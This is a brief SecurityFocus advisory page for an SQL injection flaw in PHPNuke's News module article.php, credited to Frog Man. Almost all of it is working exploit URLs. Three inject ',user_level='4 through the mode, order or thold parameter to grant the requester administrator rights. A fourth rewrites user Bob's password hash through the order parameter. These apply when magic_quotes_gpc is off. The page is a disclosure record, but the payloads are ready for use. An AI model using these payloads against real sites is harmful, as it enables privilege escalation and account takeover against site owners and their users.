PHPNuke News Module Article.PHP SQL Injection Vulnerability

The following exploit information was provided by Frog Man <leseulfrog@hotmail.com>:

if magic_quotes_gpc=OFF :

Change our level (into admin) :
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4

or

http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4

or

http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4


Change the user Bob's password :
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*


 

Privacy Statement
Copyright 2010, SecurityFocus